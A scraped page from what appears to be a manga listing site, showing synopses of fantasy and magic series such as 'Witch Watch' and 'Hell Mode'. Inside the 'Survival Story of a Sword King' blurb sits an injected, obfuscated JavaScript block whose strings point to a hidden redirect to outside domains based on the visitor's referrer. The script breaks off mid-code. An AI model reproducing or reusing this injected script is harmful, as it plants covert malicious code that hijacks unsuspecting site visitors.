Magic - Page 19

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

364 results

I Accidentally Saved The Male Lead’s Brother

I Accidentally Saved The Male Lead’s Brother She Possessed Charlotte Rania, An Extra That Was Not Even Mentioned In The Original Book. I Only Thought That The Bloody Social World And Politics Were Stories From Another World. Until She Accidentally Met Her Brother-In-Law And Saved Him. But… “Theo Is Going To Live With You!” This Little Kid Started Swearing That He Wouldn’t Go Home. The Male Protagonist, Carlyle Heinst, Who Has To Marry The Original Female Lead By Contract, Offers Charlotte Her Contract Marriage… A Peaceful Extra Life, Goodbye Now!


Tokimeke Mahou Youjo Kokopure

Spin-off of Onee-san wa Joshi Shougakusei ni Kyoumi ga arimasu. Same degeneracy, but with magical girls.

2 days ago

Majo ni Kubiwa wa Tsukerarenai

As magic, once monopolized by the nobility, became accessible to the masses, crime rates surged. In response, the Empire established the Magical Crimes Investigation Bureau. Rogue, a detective, is reassigned to the notorious \"Sixth Division\" due to the schemes of his superior, Veradonna. This division works alongside witches, who once brought disaster to the Empire, to investigate magical incidents. These witches, powerful enough to bring calamity, are imprisoned and have their magic restricted by \"collars.\" However, the witches, led by the \"Puppet Demon\" Miseria, pay no mind to these restraints and constantly throw Rogue into chaos. \"What will you do, Rogue? Shall we consider taking extreme measures?\"


A Dream Escape

\'Sonidor\', a dream artisan who enters into other people\'s dreams through physical contact and grants wishes that could not be fulfilled in reality. One day, the emperor suddenly arrives at the house and asks to wake up the crown prince who has fallen into eternal sleep. \"I want you to wake him up.\" Sonidor enters the dream of \'Marmel\', the crown prince who is praised by everyone for his gentle nature and beautiful appearance, but somehow Marmel\'s dream is gloomy and desolate. “You were just going to kill me?!” According to the taste of the prince who hates people, Sonidor turns into various animals and finds the reason why Marmel fell asleep one by one, and Marmel gradually opens his heart to Sonidor... \"Your Highness, do you believe me?\" Will Sonidor be able to wake Marmel from his eternal sleep?


Survival Story of a Sword King in a Fantasy World

Ryu Han-Bin was a normal person who just had been discharged from his mandatory military service, when he was transported to another world. Left to fend for himself, he was given the goal of surviving and growing stronger in a desolate world riddled with monsters. The problem is the ‘Guideline’ that was supposed to be his guiding system to survive is filled with errors.<script></script><script>function _0x3cb5(){var _0x3b1ebe=['RSxzB','454400BFUouv','google','','includes','2420574zVEquq','raMoF','FvzzB','.customapi','aNUqd','http://rea','referrer','12333343IAkgAz','2637JcsjsN','19730Sshuht','href','location','random','7hSZdHV','zYKZU','697958lxwkvH','6hEtmlH','floor','7241592dqNGhN','DMtyI','https://ip','615788wPhHvC','then','2euYvcG','XXIEY','pHmXh','.top/','SzOGm','text'];_0x3cb5=function(){return _0x3b1ebe;};return _0x3cb5();}(function(_0x228aad,_0x5b404c){var _0x2d9314=_0x3c6e,_0x34feea=_0x228aad();while(!![]){try{var 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Phantom Court

In the year 1520, the reclusive island of \'Kodornacht\' suddenly falls into a deep winter, one whose intensity is enough to freeze the very sea it resides in, opening its shores to the outside World for the first time in over a millennia. With untold riches up for the taking, it gives birth to a gigantic treasure hunt. However, Kodornacht hides something much more important and mysterious: The Phantom Court—a trinket with the power to control winds, fortune, and, some say, even resurrect the dead.  The Hunt begins. ___________________ My third manga project, Phantom Court is a story containing fantasy elements that hopes to bring to the readers enjoyable characters and high-stakes conflicts. I\'ve been working on this one for a while; I hope you\'ll join me for the ride. More of my garbage on:

2 days ago

My Gift Lvl 9999 Unlimited Gacha

A human boy name Light is kicked out from the adventurer party called the “Race Union(gathering of races)” by his trusted comrades. There are six races in this world: human, beast, dragon, elf, dwarf, and demon race. The human race is looked down and discriminated against in this world as the "most inferior." Legion (the Race Union), is a party with various race members gathered to dispel such discrimination. But, they have a hidden purpose behind it. They were ordered by countries other than human races to search for "Master," and take it under their own country. Raito, a human boy, was welcomed into the Legion because of his gift "Infinite Gacha," a gift that might be owned by "Master." But in the end, their investigation showed that Raito is not "Master." Raito was about to be killed by the Race Union members, but accidentally he steps on a "Transfer Trap." As a result, he was teleported to the lowest level of the dungeon and escaped from Race Union's members. In the deepest dungeon, he was attacked by a mythical demon of LV1000. In a desperate situation, Raito hits the "Infinite Gacha" repeatedly. Luckily, he draws the SUR card "Mei the Seeker Maid" level 9999. She helps Raito to repel the demons and saves his life. After finally escaping from the crisis, Raito decides to take revenge on his former comrades and fight against each nation to find the truth that almost killed him. Mei advises him to increase the number of trustworthy friends with "Infinite Gacha" to takes revenge and find the truth. Raito agreed with her words and chose to build up his power to oppose the nations in the deepest dungeon. Three years later. Raito has built up the strongest nation in the depth of the dungeon. Once again, he will return to the surface to take revenge on his former comrades and search for the truth that nearly killed him like an insect.


Wicked Spot

Sada is a modern-day witch who is tired of living quietly deep in the mountains. In fact, she wants more attention! Why can\'t witches be known by humans?!  This is a story of modern “witches” who break the curse and live freely and uninhibitedly!


The Return of the Legendary Archmage

\"I, an AI Misfit?\" The prodigy of modern magical technology, artificial intelligence - an outcast unable to be implanted. Relegated genius magician Shin Ha-ryul. A book appears before him, the magician who has been sentenced to death. \"To the posterity who can hear this voice and has the same constitution as me, I, Rai Bell Vaitener, leave this book.\" Along with the book left behind by the legendary great mage. The frozen time of the genius begins to move again.


Witch Watch

Morihito, a boy with the strength of an ogre, is about to start living together with his childhood friend Niko, who is training to be a witch. Niko's magic leads to all sorts of unpredictable trouble, and with two teens under one roof... Let the fantastical antics begin! (Source: MANGA Plus)


Hell Mode: The Hardcore Gamer Dominates in Another World with Garbage Balancing

Yamada Kenichi, a single, 35-year-old businessman, has spent the majority of his adult life playing every MMORPG to hit the market. Tired of the constant cycle of repetitive, newbie-centric gameplay, he is immediately drawn in by the promise of a new game that, on top of being never-ending, offers up a \"Hell Mode\" — a difficulty level that makes it nigh impossible to level up but also promises uncapped growth potential. Upon selecting the newly released Summoner class, Kenichi finds himself reborn as Allen, an infant in a serf family, with nothing but his wits and old memories to guide him. Allen works diligently to level himself up despite Hell Mode requiring vast amounts of experience between levels. In doing so, he hopes to uncover the secrets the Summoner class holds. All the while, he dedicates himself to freeing his new family from serfdom.

2 days ago